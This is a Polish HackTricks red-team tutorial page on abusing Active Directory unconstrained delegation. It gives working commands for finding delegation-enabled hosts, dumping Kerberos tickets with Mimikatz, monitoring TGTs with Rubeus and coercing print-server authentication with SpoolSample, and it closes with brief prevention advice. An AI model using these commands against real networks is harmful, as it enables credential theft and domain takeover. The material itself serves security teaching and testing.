Unconstrained Delegation

Dowiedz się, jak hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Pracujesz w firmie zajmującej się cyberbezpieczeństwem? Chcesz zobaczyć swoją firmę reklamowaną w HackTricks? A może chcesz mieć dostęp do najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF? Sprawdź PLAN SUBSKRYPCYJNY!
Odkryj Rodzinę PEASS, naszą kolekcję ekskluzywnych NFT
Zdobądź oficjalne gadżety PEASS & HackTricks
Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź mnie na Twitterze 🐦@carlospolopm.
Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do repozytorium hacktricks i hacktricks-cloud.

Delegacja bez ograniczeń

Jest to funkcja, którą administrator domeny może ustawić dla dowolnego komputera w domenie. Wtedy, za każdym razem, gdy użytkownik loguje się na komputerze, kopia TGT tego użytkownika zostanie wysłana do TGS dostarczonego przez DC i zapisana w pamięci w LSASS. Jeśli masz uprawnienia administratora na maszynie, będziesz mógł wydobyć bilety i podszywać się pod użytkowników na dowolnej maszynie.

Jeśli administrator domeny zaloguje się na komputerze z aktywowaną funkcją "Delegacja bez ograniczeń", a ty masz uprawnienia lokalnego administratora na tej maszynie, będziesz mógł wydobyć bilet i podszywać się pod administratora domeny gdziekolwiek (przywileje domeny).

Możesz znaleźć obiekty komputerowe z tą właściwością, sprawdzając, czy atrybut userAccountControl zawiera ADS_UF_TRUSTED_FOR_DELEGATION. Możesz to zrobić za pomocą filtru LDAP „(userAccountControl:1.2.840.113556.1.4.803:=524288)”, co robi powerview:

# Wyświetl komputery bez ograniczeń
## Powerview
Get-NetComputer -Unconstrained #DCs zawsze się pojawiają, ale nie są przydatne do eskalacji uprawnień
## ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
# Eksportuj bilety za pomocą Mimikatz
privilege::debug
sekurlsa::tickets /export #Sposób zalecany
kerberos::list /export #Inny sposób

# Monitoruj logowania i eksportuj nowe bilety
.\Rubeus.exe monitor /targetuser:<username> /interval:10 #Sprawdzaj co 10 sekund nowe TGT

Załaduj bilet Administratora (lub ofiary) do pamięci za pomocą Mimikatz lub Rubeus dla Pass the Ticket. Więcej informacji: https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/ Więcej informacji o delegacji bez ograniczeń na stronie ired.team.

Wymuś uwierzytelnianie

Jeśli atakujący jest w stanie zakraść się na komputerze zezwalającym na "Delegację bez ograniczeń", może oszukać serwer drukowania, aby automatycznie się zalogować i zapisać TGT w pamięci serwera. Następnie atakujący mógłby przeprowadzić atak Pass the Ticket, aby podszywać się pod konto użytkownika serwera drukowania.

Aby zmusić serwer drukowania do zalogowania się na dowolnej maszynie, można użyć SpoolSample:

.\SpoolSample.exe <printmachine> <unconstrinedmachine>

Jeśli TGT pochodzi od kontrolera domeny, można przeprowadzić atak DCSync i uzyskać wszystkie hashe z kontrolera domeny. Więcej informacji na temat tego ataku na stronie ired.team.

Oto inne sposoby próby wymuszenia uwierzytelnienia:

pageForce NTLM Privileged Authentication

Zapobieganie

Ogranicz logowanie DA/Admin do konkretnych usług
Ustaw "Konto jest wrażliwe i nie można go delegować" dla kont uprzywilejowanych.

Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Pracujesz w firmie cyberbezpieczeństwa? Chcesz zobaczyć swoją firmę reklamowaną w HackTricks? A może chcesz mieć dostęp do najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF? Sprawdź PLAN SUBSKRYPCYJNY!
Odkryj Rodzinę PEASS, naszą kolekcję ekskluzywnych NFT
Zdobądź oficjalne gadżety PEASS & HackTricks
Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź mnie na Twitterze 🐦@carlospolopm.
Podziel się swoimi sztuczkami hakerskimi, przesyłając PR do repozytorium hacktricks i hacktricks-cloud.

PreviousSkeleton Key NextWindows Security Controls

Last updated 2 months ago